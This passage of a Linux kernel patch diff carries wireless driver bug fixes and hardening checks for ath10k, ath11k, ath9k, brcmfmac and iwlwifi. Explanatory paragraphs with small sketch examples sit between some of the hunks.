+@@ -330,6 +336,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA6174_HW_3_2_VERSION,
+@@ -373,6 +380,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = true,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA99X0_HW_2_0_DEV_VERSION,
+@@ -418,6 +426,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA9984_HW_1_0_DEV_VERSION,
+@@ -470,6 +479,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA9888_HW_2_0_DEV_VERSION,
+@@ -519,6 +529,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA9377_HW_1_0_DEV_VERSION,
+@@ -558,6 +569,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA9377_HW_1_1_DEV_VERSION,
+@@ -599,6 +611,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA9377_HW_1_1_DEV_VERSION,
+@@ -631,6 +644,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = QCA4019_HW_1_0_DEV_VERSION,
+@@ -677,6 +691,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = false,
+ 		.hw_restart_disconnect = false,
+ 		.use_fw_tx_credits = true,
++		.delay_unmap_buffer = false,
+ 	},
+ 	{
+ 		.id = WCN3990_HW_1_0_DEV_VERSION,
+@@ -709,6 +724,7 @@ static const struct ath10k_hw_params ath10k_hw_params_list[] = {
+ 		.dynamic_sar_support = true,
+ 		.hw_restart_disconnect = true,
+ 		.use_fw_tx_credits = false,
++		.delay_unmap_buffer = true,
+ 	},
+ };
+ 
+diff --git a/drivers/net/wireless/ath/ath10k/htc.c b/drivers/net/wireless/ath/ath10k/htc.c
+index 6d1784f74bea4..5bfeecb95fca2 100644
+--- a/drivers/net/wireless/ath/ath10k/htc.c
++++ b/drivers/net/wireless/ath/ath10k/htc.c
+@@ -56,6 +56,15 @@ void ath10k_htc_notify_tx_completion(struct ath10k_htc_ep *ep,
+ 	ath10k_dbg(ar, ATH10K_DBG_HTC, "%s: ep %d skb %pK\n", __func__,
+ 		   ep->eid, skb);
+ 
++	/* A corner case where the copy completion is reaching to host but still
++	 * copy engine is processing it due to which host unmaps corresponding
++	 * memory and causes SMMU fault, hence as workaround adding delay
++	 * the unmapping memory to avoid SMMU faults.
++	 */
++	if (ar->hw_params.delay_unmap_buffer &&
++	    ep->ul_pipe_id == 3)
++		mdelay(2);
++
+ 	hdr = (struct ath10k_htc_hdr *)skb->data;
+ 	ath10k_htc_restore_tx_skb(ep->htc, skb);
+ 
+diff --git a/drivers/net/wireless/ath/ath10k/hw.h b/drivers/net/wireless/ath/ath10k/hw.h
+index 1b99f3a39a113..9643031a4427a 100644
+--- a/drivers/net/wireless/ath/ath10k/hw.h
++++ b/drivers/net/wireless/ath/ath10k/hw.h
+@@ -637,6 +637,8 @@ struct ath10k_hw_params {
+ 	bool hw_restart_disconnect;
+ 
+ 	bool use_fw_tx_credits;
++
++	bool delay_unmap_buffer;
+ };
+ 
+ struct htt_resp;
+diff --git a/drivers/net/wireless/ath/ath10k/pci.c b/drivers/net/wireless/ath/ath10k/pci.c
+index e56c6a6b13791..728d607289c36 100644
+--- a/drivers/net/wireless/ath/ath10k/pci.c
++++ b/drivers/net/wireless/ath/ath10k/pci.c
+@@ -3792,18 +3792,22 @@ static struct pci_driver ath10k_pci_driver = {
+ 
+ static int __init ath10k_pci_init(void)
+ {
+-	int ret;
++	int ret1, ret2;
+ 
+-	ret = pci_register_driver(&ath10k_pci_driver);
+-	if (ret)
++	ret1 = pci_register_driver(&ath10k_pci_driver);
++	if (ret1)
+ 		printk(KERN_ERR "failed to register ath10k pci driver: %d\n",
+-		       ret);
++		       ret1);
+ 
+-	ret = ath10k_ahb_init();
+-	if (ret)
+-		printk(KERN_ERR "ahb init failed: %d\n", ret);
++	ret2 = ath10k_ahb_init();
++	if (ret2)
++		printk(KERN_ERR "ahb init failed: %d\n", ret2);
+ 
+-	return ret;
++	if (ret1 && ret2)
++		return ret1;
++
++	/* registered to at least one bus */
++	return 0;
+ }
+ module_init(ath10k_pci_init);
+ 
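
ath10k_pci_init() registers two independent back ends (PCI and AHB) from one module_init; the old code returned only the second result, so an AHB failure could unload a module whose PCI registration had succeeded, and an AHB success could mask a PCI error. The fix keeps both results and fails only when neither bus came up. Reduced to a sketch with hypothetical registration helpers:

        static int foo_register_bus_a(void);    /* hypothetical back end A */
        static int foo_register_bus_b(void);    /* hypothetical back end B */

        static int __init foo_init(void)
        {
                int ret_a, ret_b;

                ret_a = foo_register_bus_a();
                ret_b = foo_register_bus_b();

                if (ret_a && ret_b)
                        return ret_a;   /* both failed: report the first error */

                return 0;               /* usable on at least one bus */
        }
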
+diff --git a/drivers/net/wireless/ath/ath11k/core.h b/drivers/net/wireless/ath/ath11k/core.h
+index cf2f52cc4e30d..c20e84e031fad 100644
+--- a/drivers/net/wireless/ath/ath11k/core.h
++++ b/drivers/net/wireless/ath/ath11k/core.h
+@@ -505,6 +505,8 @@ struct ath11k_sta {
+ 	u64 ps_start_jiffies;
+ 	u64 ps_total_duration;
+ 	bool peer_current_ps_valid;
++
++	u32 bw_prev;
+ };
+ 
+ #define ATH11K_MIN_5G_FREQ 4150
+diff --git a/drivers/net/wireless/ath/ath11k/mac.c b/drivers/net/wireless/ath/ath11k/mac.c
+index 2d1e3fd9b526c..ef7617802491e 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.c
++++ b/drivers/net/wireless/ath/ath11k/mac.c
+@@ -4215,10 +4215,11 @@ static void ath11k_sta_rc_update_wk(struct work_struct *wk)
+ 	const u8 *ht_mcs_mask;
+ 	const u16 *vht_mcs_mask;
+ 	const u16 *he_mcs_mask;
+-	u32 changed, bw, nss, smps;
++	u32 changed, bw, nss, smps, bw_prev;
+ 	int err, num_vht_rates, num_he_rates;
+ 	const struct cfg80211_bitrate_mask *mask;
+ 	struct peer_assoc_params peer_arg;
++	enum wmi_phy_mode peer_phymode;
+ 
+ 	arsta = container_of(wk, struct ath11k_sta, update_wk);
+ 	sta = container_of((void *)arsta, struct ieee80211_sta, drv_priv);
+@@ -4239,6 +4240,7 @@ static void ath11k_sta_rc_update_wk(struct work_struct *wk)
+ 	arsta->changed = 0;
+ 
+ 	bw = arsta->bw;
++	bw_prev = arsta->bw_prev;
+ 	nss = arsta->nss;
+ 	smps = arsta->smps;
+ 
+@@ -4252,26 +4254,57 @@ static void ath11k_sta_rc_update_wk(struct work_struct *wk)
+ 			   ath11k_mac_max_he_nss(he_mcs_mask)));
+ 
+ 	if (changed & IEEE80211_RC_BW_CHANGED) {
+-		/* Send peer assoc command before set peer bandwidth param to
+-		 * avoid the mismatch between the peer phymode and the peer
+-		 * bandwidth.
+-		 */
+-		ath11k_peer_assoc_prepare(ar, arvif->vif, sta, &peer_arg, true);
+-
+-		peer_arg.is_assoc = false;
+-		err = ath11k_wmi_send_peer_assoc_cmd(ar, &peer_arg);
+-		if (err) {
+-			ath11k_warn(ar->ab, "failed to send peer assoc for STA %pM vdev %i: %d\n",
+-				    sta->addr, arvif->vdev_id, err);
+-		} else if (wait_for_completion_timeout(&ar->peer_assoc_done, 1 * HZ)) {
++		/* Get the peer phymode */
++		ath11k_peer_assoc_h_phymode(ar, arvif->vif, sta, &peer_arg);
++		peer_phymode = peer_arg.peer_phymode;
++
++		ath11k_dbg(ar->ab, ATH11K_DBG_MAC, "mac update sta %pM peer bw %d phymode %d\n",
++			   sta->addr, bw, peer_phymode);
++
++		if (bw > bw_prev) {
++			/* BW is upgraded. In this case we send WMI_PEER_PHYMODE
++			 * followed by WMI_PEER_CHWIDTH
++			 */
++			ath11k_dbg(ar->ab, ATH11K_DBG_MAC, "mac BW upgrade for sta %pM new BW %d, old BW %d\n",
++				   sta->addr, bw, bw_prev);
++
++			err = ath11k_wmi_set_peer_param(ar, sta->addr, arvif->vdev_id,
++							WMI_PEER_PHYMODE, peer_phymode);
++
++			if (err) {
++				ath11k_warn(ar->ab, "failed to update STA %pM peer phymode %d: %d\n",
++					    sta->addr, peer_phymode, err);
++				goto err_rc_bw_changed;
++			}
++
+ 			err = ath11k_wmi_set_peer_param(ar, sta->addr, arvif->vdev_id,
+ 							WMI_PEER_CHWIDTH, bw);
++
+ 			if (err)
+ 				ath11k_warn(ar->ab, "failed to update STA %pM peer bw %d: %d\n",
+ 					    sta->addr, bw, err);
+ 		} else {
+-			ath11k_warn(ar->ab, "failed to get peer assoc conf event for %pM vdev %i\n",
+-				    sta->addr, arvif->vdev_id);
++			/* BW is downgraded. In this case we send WMI_PEER_CHWIDTH
++			 * followed by WMI_PEER_PHYMODE
++			 */
++			ath11k_dbg(ar->ab, ATH11K_DBG_MAC, "mac BW downgrade for sta %pM new BW %d,old BW %d\n",
++				   sta->addr, bw, bw_prev);
++
++			err = ath11k_wmi_set_peer_param(ar, sta->addr, arvif->vdev_id,
++							WMI_PEER_CHWIDTH, bw);
++
++			if (err) {
++				ath11k_warn(ar->ab, "failed to update STA %pM peer bw %d: %d\n",
++					    sta->addr, bw, err);
++				goto err_rc_bw_changed;
++			}
++
++			err = ath11k_wmi_set_peer_param(ar, sta->addr, arvif->vdev_id,
++							WMI_PEER_PHYMODE, peer_phymode);
++
++			if (err)
++				ath11k_warn(ar->ab, "failed to update STA %pM peer phymode %d: %d\n",
++					    sta->addr, peer_phymode, err);
+ 		}
+ 	}
+ 
+@@ -4352,6 +4385,7 @@ static void ath11k_sta_rc_update_wk(struct work_struct *wk)
+ 		}
+ 	}
+ 
++err_rc_bw_changed:
+ 	mutex_unlock(&ar->conf_mutex);
+ }
+ 
+@@ -4505,6 +4539,34 @@ exit:
+ 	return ret;
+ }
+ 
++static u32 ath11k_mac_ieee80211_sta_bw_to_wmi(struct ath11k *ar,
++					      struct ieee80211_sta *sta)
++{
++	u32 bw = WMI_PEER_CHWIDTH_20MHZ;
++
++	switch (sta->deflink.bandwidth) {
++	case IEEE80211_STA_RX_BW_20:
++		bw = WMI_PEER_CHWIDTH_20MHZ;
++		break;
++	case IEEE80211_STA_RX_BW_40:
++		bw = WMI_PEER_CHWIDTH_40MHZ;
++		break;
++	case IEEE80211_STA_RX_BW_80:
++		bw = WMI_PEER_CHWIDTH_80MHZ;
++		break;
++	case IEEE80211_STA_RX_BW_160:
++		bw = WMI_PEER_CHWIDTH_160MHZ;
++		break;
++	default:
++		ath11k_warn(ar->ab, "Invalid bandwidth %d for %pM\n",
++			    sta->deflink.bandwidth, sta->addr);
++		bw = WMI_PEER_CHWIDTH_20MHZ;
++		break;
++	}
++
++	return bw;
++}
++
+ static int ath11k_mac_op_sta_state(struct ieee80211_hw *hw,
+ 				   struct ieee80211_vif *vif,
+ 				   struct ieee80211_sta *sta,
+@@ -4590,6 +4652,12 @@ static int ath11k_mac_op_sta_state(struct ieee80211_hw *hw,
+ 		if (ret)
+ 			ath11k_warn(ar->ab, "Failed to associate station: %pM\n",
+ 				    sta->addr);
++
++		spin_lock_bh(&ar->data_lock);
++		/* Set arsta bw and prev bw */
++		arsta->bw = ath11k_mac_ieee80211_sta_bw_to_wmi(ar, sta);
++		arsta->bw_prev = arsta->bw;
++		spin_unlock_bh(&ar->data_lock);
+ 	} else if (old_state == IEEE80211_STA_ASSOC &&
+ 		   new_state == IEEE80211_STA_AUTHORIZED) {
+ 		spin_lock_bh(&ar->ab->base_lock);
+@@ -4713,28 +4781,8 @@ static void ath11k_mac_op_sta_rc_update(struct ieee80211_hw *hw,
+ 	spin_lock_bh(&ar->data_lock);
+ 
+ 	if (changed & IEEE80211_RC_BW_CHANGED) {
+-		bw = WMI_PEER_CHWIDTH_20MHZ;
+-
+-		switch (sta->deflink.bandwidth) {
+-		case IEEE80211_STA_RX_BW_20:
+-			bw = WMI_PEER_CHWIDTH_20MHZ;
+-			break;
+-		case IEEE80211_STA_RX_BW_40:
+-			bw = WMI_PEER_CHWIDTH_40MHZ;
+-			break;
+-		case IEEE80211_STA_RX_BW_80:
+-			bw = WMI_PEER_CHWIDTH_80MHZ;
+-			break;
+-		case IEEE80211_STA_RX_BW_160:
+-			bw = WMI_PEER_CHWIDTH_160MHZ;
+-			break;
+-		default:
+-			ath11k_warn(ar->ab, "Invalid bandwidth %d in rc update for %pM\n",
+-				    sta->deflink.bandwidth, sta->addr);
+-			bw = WMI_PEER_CHWIDTH_20MHZ;
+-			break;
+-		}
+-
++		bw = ath11k_mac_ieee80211_sta_bw_to_wmi(ar, sta);
++		arsta->bw_prev = arsta->bw;
+ 		arsta->bw = bw;
+ 	}
+ 
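
The ath11k rc-update rework replaces the full peer-assoc exchange with two targeted WMI writes whose order depends on the direction of the change: on an upgrade the phymode is raised before the channel width, on a downgrade the width is shrunk first, presumably so the firmware never sees a channel width the currently programmed phymode cannot carry (the removed comment called this the phymode/bandwidth mismatch). The ordering, restated with hypothetical names:

        enum { PARAM_CHWIDTH, PARAM_PHYMODE };  /* hypothetical parameter ids */

        struct foo_peer {
                u32 bw;         /* last applied width, i.e. the bw_prev bookkeeping */
        };

        static int foo_set_param(struct foo_peer *p, int id, u32 val); /* hypothetical */

        static int foo_update_peer_bw(struct foo_peer *peer, u32 new_bw, u32 new_phymode)
        {
                int err;

                if (new_bw > peer->bw) {
                        /* upgrade: widen the phymode first, then the width */
                        err = foo_set_param(peer, PARAM_PHYMODE, new_phymode);
                        if (!err)
                                err = foo_set_param(peer, PARAM_CHWIDTH, new_bw);
                } else {
                        /* downgrade: shrink the width first, then the phymode */
                        err = foo_set_param(peer, PARAM_CHWIDTH, new_bw);
                        if (!err)
                                err = foo_set_param(peer, PARAM_PHYMODE, new_phymode);
                }

                if (!err)
                        peer->bw = new_bw;
                return err;
        }
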
+diff --git a/drivers/net/wireless/ath/ath11k/qmi.c b/drivers/net/wireless/ath/ath11k/qmi.c
+index 51de2208b7899..8358fe08c2344 100644
+--- a/drivers/net/wireless/ath/ath11k/qmi.c
++++ b/drivers/net/wireless/ath/ath11k/qmi.c
+@@ -3087,6 +3087,9 @@ static const struct qmi_msg_handler ath11k_qmi_msg_handlers[] = {
+ 			sizeof(struct qmi_wlfw_fw_init_done_ind_msg_v01),
+ 		.fn = ath11k_qmi_msg_fw_init_done_cb,
+ 	},
++
++	/* end of list */
++	{},
+ };
+ 
+ static int ath11k_qmi_ops_new_server(struct qmi_handle *qmi_hdl,
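
The one-line qmi.c fix adds the sentinel the QMI core expects: qmi_handle walks the handler table until it reaches an entry with no ->fn, so a table without a trailing empty element is read past its end. The convention, shown with a hypothetical handler:

        static const struct qmi_msg_handler foo_qmi_handlers[] = {
                {
                        .type = QMI_INDICATION,
                        .msg_id = 0x0038,                       /* hypothetical id */
                        .ei = foo_ind_msg_ei,                   /* hypothetical ei table */
                        .decoded_size = sizeof(struct foo_ind_msg),
                        .fn = foo_ind_cb,                       /* hypothetical callback */
                },
                {}      /* sentinel: the core stops at the first entry without ->fn */
        };
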
+diff --git a/drivers/net/wireless/ath/ath9k/hif_usb.c b/drivers/net/wireless/ath/ath9k/hif_usb.c
+index 4d9002a9d082c..1a2e0c7eeb023 100644
+--- a/drivers/net/wireless/ath/ath9k/hif_usb.c
++++ b/drivers/net/wireless/ath/ath9k/hif_usb.c
+@@ -708,14 +708,13 @@ static void ath9k_hif_usb_reg_in_cb(struct urb *urb)
+ 	struct rx_buf *rx_buf = (struct rx_buf *)urb->context;
+ 	struct hif_device_usb *hif_dev = rx_buf->hif_dev;
+ 	struct sk_buff *skb = rx_buf->skb;
+-	struct sk_buff *nskb;
+ 	int ret;
+ 
+ 	if (!skb)
+ 		return;
+ 
+ 	if (!hif_dev)
+-		goto free;
++		goto free_skb;
+ 
+ 	switch (urb->status) {
+ 	case 0:
+@@ -724,7 +723,7 @@ static void ath9k_hif_usb_reg_in_cb(struct urb *urb)
+ 	case -ECONNRESET:
+ 	case -ENODEV:
+ 	case -ESHUTDOWN:
+-		goto free;
++		goto free_skb;
+ 	default:
+ 		skb_reset_tail_pointer(skb);
+ 		skb_trim(skb, 0);
+@@ -735,25 +734,27 @@ static void ath9k_hif_usb_reg_in_cb(struct urb *urb)
+ 	if (likely(urb->actual_length != 0)) {
+ 		skb_put(skb, urb->actual_length);
+ 
+-		/* Process the command first */
++		/*
++		 * Process the command first.
++		 * skb is either freed here or passed to be
++		 * managed to another callback function.
++		 */
+ 		ath9k_htc_rx_msg(hif_dev->htc_handle, skb,
+ 				 skb->len, USB_REG_IN_PIPE);
+ 
+-
+-		nskb = alloc_skb(MAX_REG_IN_BUF_SIZE, GFP_ATOMIC);
+-		if (!nskb) {
++		skb = alloc_skb(MAX_REG_IN_BUF_SIZE, GFP_ATOMIC);
++		if (!skb) {
+ 			dev_err(&hif_dev->udev->dev,
+ 				"ath9k_htc: REG_IN memory allocation failure\n");
+-			urb->context = NULL;
+-			return;
++			goto free_rx_buf;
+ 		}
+ 
+-		rx_buf->skb = nskb;
++		rx_buf->skb = skb;
+ 
+ 		usb_fill_int_urb(urb, hif_dev->udev,
+ 				 usb_rcvintpipe(hif_dev->udev,
+ 						 USB_REG_IN_PIPE),
+-				 nskb->data, MAX_REG_IN_BUF_SIZE,
++				 skb->data, MAX_REG_IN_BUF_SIZE,
+ 				 ath9k_hif_usb_reg_in_cb, rx_buf, 1);
+ 	}
+ 
+@@ -762,12 +763,13 @@ resubmit:
+ 	ret = usb_submit_urb(urb, GFP_ATOMIC);
+ 	if (ret) {
+ 		usb_unanchor_urb(urb);
+-		goto free;
++		goto free_skb;
+ 	}
+ 
+ 	return;
+-free:
++free_skb:
+ 	kfree_skb(skb);
++free_rx_buf:
+ 	kfree(rx_buf);
+ 	urb->context = NULL;
+ }
+@@ -780,14 +782,10 @@ static void ath9k_hif_usb_dealloc_tx_urbs(struct hif_device_usb *hif_dev)
+ 	spin_lock_irqsave(&hif_dev->tx.tx_lock, flags);
+ 	list_for_each_entry_safe(tx_buf, tx_buf_tmp,
+ 				 &hif_dev->tx.tx_buf, list) {
+-		usb_get_urb(tx_buf->urb);
+-		spin_unlock_irqrestore(&hif_dev->tx.tx_lock, flags);
+-		usb_kill_urb(tx_buf->urb);
+ 		list_del(&tx_buf->list);
+ 		usb_free_urb(tx_buf->urb);
+ 		kfree(tx_buf->buf);
+ 		kfree(tx_buf);
+-		spin_lock_irqsave(&hif_dev->tx.tx_lock, flags);
+ 	}
+ 	spin_unlock_irqrestore(&hif_dev->tx.tx_lock, flags);
+ 
+@@ -1329,10 +1327,24 @@ static int send_eject_command(struct usb_interface *interface)
+ static int ath9k_hif_usb_probe(struct usb_interface *interface,
+ 			       const struct usb_device_id *id)
+ {
++	struct usb_endpoint_descriptor *bulk_in, *bulk_out, *int_in, *int_out;
+ 	struct usb_device *udev = interface_to_usbdev(interface);
++	struct usb_host_interface *alt;
+ 	struct hif_device_usb *hif_dev;
+ 	int ret = 0;
+ 
++	/* Verify the expected endpoints are present */
++	alt = interface->cur_altsetting;
++	if (usb_find_common_endpoints(alt, &bulk_in, &bulk_out, &int_in, &int_out) < 0 ||
++	    usb_endpoint_num(bulk_in) != USB_WLAN_RX_PIPE ||
++	    usb_endpoint_num(bulk_out) != USB_WLAN_TX_PIPE ||
++	    usb_endpoint_num(int_in) != USB_REG_IN_PIPE ||
++	    usb_endpoint_num(int_out) != USB_REG_OUT_PIPE) {
++		dev_err(&udev->dev,
++			"ath9k_htc: Device endpoint numbers are not the expected ones\n");
++		return -ENODEV;
++	}
++
+ 	if (id->driver_info == STORAGE_DEVICE)
+ 		return send_eject_command(interface);
+ 
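
The probe-time check added to ath9k_hif_usb_probe() refuses devices whose descriptors do not expose the endpoint layout the driver's hard-coded pipe numbers assume, a class of problem regularly reported against USB drivers fed by fuzzed or malicious devices. usb_find_common_endpoints() does the descriptor walk; a hedged sketch for a driver expecting one bulk-in and one bulk-out endpoint (pipe numbers hypothetical):

        #include <linux/usb.h>

        static int foo_probe(struct usb_interface *intf,
                             const struct usb_device_id *id)
        {
                struct usb_endpoint_descriptor *bulk_in, *bulk_out;

                /* fails unless the interface has the endpoint types we need */
                if (usb_find_common_endpoints(intf->cur_altsetting,
                                              &bulk_in, &bulk_out, NULL, NULL))
                        return -ENODEV;

                if (usb_endpoint_num(bulk_in) != 2 ||
                    usb_endpoint_num(bulk_out) != 1)
                        return -ENODEV; /* not the layout our pipe macros assume */

                /* ... normal probe ... */
                return 0;
        }
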
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
+index 74020fa100659..22344e68fd597 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
+@@ -305,8 +305,12 @@ int brcmf_c_preinit_dcmds(struct brcmf_if *ifp)
+ 	brcmf_info("Firmware: %s %s\n", ri->chipname, buf);
+ 
+ 	/* locate firmware version number for ethtool */
+-	ptr = strrchr(buf, ' ') + 1;
+-	strscpy(ifp->drvr->fwver, ptr, sizeof(ifp->drvr->fwver));
++	ptr = strrchr(buf, ' ');
++	if (!ptr) {
++		bphy_err(drvr, "Retrieving version number failed");
++		goto done;
++	}
++	strscpy(ifp->drvr->fwver, ptr + 1, sizeof(ifp->drvr->fwver));
+ 
+ 	/* Query for 'clmver' to get CLM version info from firmware */
+ 	memset(buf, 0, sizeof(buf));
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/firmware.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/firmware.c
+index f2207793f6e27..09d2f2dc2b46f 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/firmware.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/firmware.c
+@@ -803,6 +803,11 @@ brcmf_fw_alloc_request(u32 chip, u32 chiprev,
+ 	u32 i, j;
+ 	char end = '\0';
+ 
++	if (chiprev >= BITS_PER_TYPE(u32)) {
++		brcmf_err("Invalid chip revision %u\n", chiprev);
++		return NULL;
++	}
++
+ 	for (i = 0; i < table_size; i++) {
+ 		if (mapping_table[i].chipid == chip &&
+ 		    mapping_table[i].revmask & BIT(chiprev))
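
The brcmfmac bound check exists because BIT(chiprev) is a shift by chiprev: shifting a 32-bit value by 32 or more is undefined behavior, and even where BIT() expands to unsigned long the resulting bit would lie outside the 32-bit revmask being tested. The guard in isolation:

        #include <linux/bits.h>
        #include <linux/types.h>

        static u32 foo_rev_to_mask(u32 rev)
        {
                if (rev >= BITS_PER_TYPE(u32))  /* would shift out of the mask */
                        return 0;               /* caller treats 0 as "no match" */

                return BIT(rev);
        }
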
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+index 80083f9ea3116..5630f6e718e12 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+@@ -726,7 +726,7 @@ static int brcmf_pcie_exit_download_state(struct brcmf_pciedev_info *devinfo,
+ 	}
+ 
+ 	if (!brcmf_chip_set_active(devinfo->ci, resetintr))
+-		return -EINVAL;
++		return -EIO;
+ 	return 0;
+ }
+ 
+@@ -1218,6 +1218,10 @@ static int brcmf_pcie_init_ringbuffers(struct brcmf_pciedev_info *devinfo)
+ 				BRCMF_NROF_H2D_COMMON_MSGRINGS;
+ 		max_completionrings = BRCMF_NROF_D2H_COMMON_MSGRINGS;
+ 	}
++	if (max_flowrings > 256) {
++		brcmf_err(bus, "invalid max_flowrings(%d)\n", max_flowrings);
++		return -EIO;
++	}
+ 
+ 	if (devinfo->dma_idx_sz != 0) {
+ 		bufsz = (max_submissionrings + max_completionrings) *
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.c
+index 465d95d837592..e265a2e411a09 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.c
+@@ -3414,6 +3414,7 @@ static int brcmf_sdio_download_firmware(struct brcmf_sdio *bus,
+ 	/* Take arm out of reset */
+ 	if (!brcmf_chip_set_active(bus->ci, rstvec)) {
+ 		brcmf_err("error getting out of ARM core reset\n");
++		bcmerror = -EIO;
+ 		goto err;
+ 	}
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mei/iwl-mei.h b/drivers/net/wireless/intel/iwlwifi/mei/iwl-mei.h
+index 67122cfa22920..5409699c9a1fd 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mei/iwl-mei.h
++++ b/drivers/net/wireless/intel/iwlwifi/mei/iwl-mei.h
+@@ -446,9 +446,10 @@ void iwl_mei_host_associated(const struct iwl_mei_conn_info *conn_info,
+ void iwl_mei_host_disassociated(void);
+ 
+ /**
+- * iwl_mei_device_down() - must be called when the device is down
++ * iwl_mei_device_state() - must be called when the device changes up/down state
++ * @up: true if the device is up, false otherwise.
+  */
+-void iwl_mei_device_down(void);
++void iwl_mei_device_state(bool up);
+ 
+ #else
+ 
+@@ -497,7 +498,7 @@ static inline void iwl_mei_host_associated(const struct iwl_mei_conn_info *conn_
+ static inline void iwl_mei_host_disassociated(void)
+ {}
+ 
+-static inline void iwl_mei_device_down(void)
++static inline void iwl_mei_device_state(bool up)
+ {}
+ 
+ #endif /* CONFIG_IWLMEI */
+diff --git a/drivers/net/wireless/intel/iwlwifi/mei/main.c b/drivers/net/wireless/intel/iwlwifi/mei/main.c
+index 357f14626cf43..c0142093c7682 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mei/main.c
++++ b/drivers/net/wireless/intel/iwlwifi/mei/main.c
+@@ -147,9 +147,13 @@ struct iwl_mei_filters {
+  *	to send CSME_OWNERSHIP_CONFIRMED when the driver completes its down
+  *	flow.
+  * @link_prot_state: true when we are in link protection PASSIVE
++ * @device_down: true if the device is down. Used to remember to send
++ *	CSME_OWNERSHIP_CONFIRMED when the driver is already down.
+  * @csa_throttle_end_wk: used when &csa_throttled is true
+  * @data_q_lock: protects the access to the data queues which are
+  *	accessed without the mutex.
++ * @netdev_work: used to defer registering and unregistering of the netdev to
++ *	avoid taking the rtnl lock in the SAP messages handlers.
+  * @sap_seq_no: the sequence number for the SAP messages
+  * @seq_no: the sequence number for the SAP messages
+  * @dbgfs_dir: the debugfs dir entry
+@@ -167,8 +171,10 @@ struct iwl_mei {
+ 	bool csa_throttled;
+ 	bool csme_taking_ownership;
+ 	bool link_prot_state;
++	bool device_down;
+ 	struct delayed_work csa_throttle_end_wk;
+ 	spinlock_t data_q_lock;
++	struct work_struct netdev_work;
+ 
+ 	atomic_t sap_seq_no;
+ 	atomic_t seq_no;
+@@ -588,13 +594,38 @@ static rx_handler_result_t iwl_mei_rx_handler(struct sk_buff **pskb)
+ 	return res;
+ }
+ 
++static void iwl_mei_netdev_work(struct work_struct *wk)
++{
++	struct iwl_mei *mei =
++		container_of(wk, struct iwl_mei, netdev_work);
++	struct net_device *netdev;
++
++	/*
++	 * First take rtnl and only then the mutex to avoid an ABBA
++	 * with iwl_mei_set_netdev()
++	 */
++	rtnl_lock();
++	mutex_lock(&iwl_mei_mutex);
++
++	netdev = rcu_dereference_protected(iwl_mei_cache.netdev,
++					   lockdep_is_held(&iwl_mei_mutex));
++	if (netdev) {
++		if (mei->amt_enabled)
++			netdev_rx_handler_register(netdev, iwl_mei_rx_handler,
++						   mei);
++		else
++			netdev_rx_handler_unregister(netdev);
++	}
++
++	mutex_unlock(&iwl_mei_mutex);
++	rtnl_unlock();
++}
++
+ static void
+ iwl_mei_handle_rx_start_ok(struct mei_cl_device *cldev,
+ 			   const struct iwl_sap_me_msg_start_ok *rsp,
+ 			   ssize_t len)
+ {
+-	struct iwl_mei *mei = mei_cldev_get_drvdata(cldev);
+-
+ 	if (len != sizeof(*rsp)) {
+ 		dev_err(&cldev->dev,
+ 			"got invalid SAP_ME_MSG_START_OK from CSME firmware\n");
+@@ -613,13 +644,10 @@ iwl_mei_handle_rx_start_ok(struct mei_cl_device *cldev,
+ 
+ 	mutex_lock(&iwl_mei_mutex);
